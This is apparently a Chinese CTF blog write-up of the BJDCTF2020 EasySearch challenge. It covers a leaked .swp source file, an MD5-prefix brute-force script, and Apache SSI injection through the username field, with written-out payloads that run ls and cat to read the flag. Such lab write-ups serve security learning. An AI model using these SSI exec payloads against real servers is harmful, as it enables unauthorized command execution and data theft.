BJDCTF2020 EasySearch

做了这题,发现自己太年轻,经验太少了,很多知识点都不知道。

打开靶机,两个username,它把后面那个password故意写成的username

F12、robots协议、抓包都没发现啥,SQL注入没试

题目名是EasySearch,应该是扫描网站,使用dirsearch扫描

第一个年轻

扫了看不出来哪些敏感文件或url,我只尝试了www.zip,某些常见url,还有看看有没有git泄露,发现也没有,我就没思路了

后来才知道还有index.php.swp这个文件

我们打开文件

第二个年轻

盲目代码审计,大家看看我认真的审计过程

其实根本用不到那么多,只有那一段密码MD5加密后等于6d0bc1是重要的

写python脚本找出字符串MD5加密后前6位等于6d0bc1的,脚本如下

import hashlib

for i in range(100000000):
    a = hashlib.md5(str(i).encode("utf-8")).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)

找到的字符串如下

随便选一个输进去,抓包,放包

发现右边有一个Url_is_here: public/4038a37f9e5d90ca69ab73cf85ce1cbca92c6930.shtml,进入这个网页

第三个年轻

看见Client IP,以为需要我伪造IP地址,试了才发现没用

这题思路是利用“Apache SSI远程命令执行漏洞”,虽然不太理解,但跟着wp走

给username变量中传入ssi语句来远程执行系统命令

先查看当前目录<!--#exec cmd="ls"-->

并没有什么有用的发现,我们返回上一个目录看看

<!--#exec cmd="ls ../"-->

终于有了发现,进入那个flag_990c66bf85a09c664f0b6741840499b2目录

<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->

做题就像是在摸着别人的脚印在做,毫无成绩感,什么时候才能自己写出一道高质量的题目。最近想复现一些经典漏洞玩,也不知道怎么复现,poc扔docker?,找时间弄弄

基础太差了,缺少太多知识,发现不了敏感文件,摸不清题目意图,太多知识盲区。

好烦!

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tajang

感谢投喂

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值